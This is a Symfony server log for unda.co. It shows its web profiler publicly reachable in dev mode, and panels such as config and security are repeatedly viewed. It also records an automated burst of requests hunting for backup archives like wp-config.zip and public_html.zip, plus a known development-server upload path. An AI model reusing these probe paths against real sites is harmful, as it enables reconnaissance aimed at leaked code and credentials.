[2025-12-18 05:54:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f8e8c5","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f8e8c5?panel=validator","method":"GET"} []
[2025-12-18 05:54:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-18 05:58:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3?panel=config","method":"GET"} []
[2025-12-18 05:58:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 05:59:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=swiftmailer","method":"GET"} []
[2025-12-18 05:59:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-18 06:01:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3","method":"GET"} []
[2025-12-18 06:01:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 06:01:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"40ceeb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/40ceeb?panel=twig","method":"GET"} []
[2025-12-18 06:01:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 06:02:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:08:46] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-18 06:08:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-18 06:09:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /developmentserver/metadatauploader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /developmentserver/metadatauploader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:17:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:17:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=212.47.64.207&limit=10","method":"GET"} []
[2025-12-18 06:17:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=212.47.64.207&limit=10","method":"GET"} []
[2025-12-18 06:20:19] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-18 06:20:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-18 06:20:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3?panel=twig","method":"GET"} []
[2025-12-18 06:20:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 06:20:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3?panel=security","method":"GET"} []
[2025-12-18 06:20:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /root.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /root.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /websites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /websites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /subdomain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /subdomain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public_html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public_html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wwwroot.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wwwroot.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /htdocs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /htdocs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clients.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clients.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /client.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /client.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /portal.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /portal.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /downloads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /downloads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /media.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /media.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /images.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /images.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /inetpub.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /inetpub.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /web.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /web.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /website.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /website.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /documents.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /documents.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
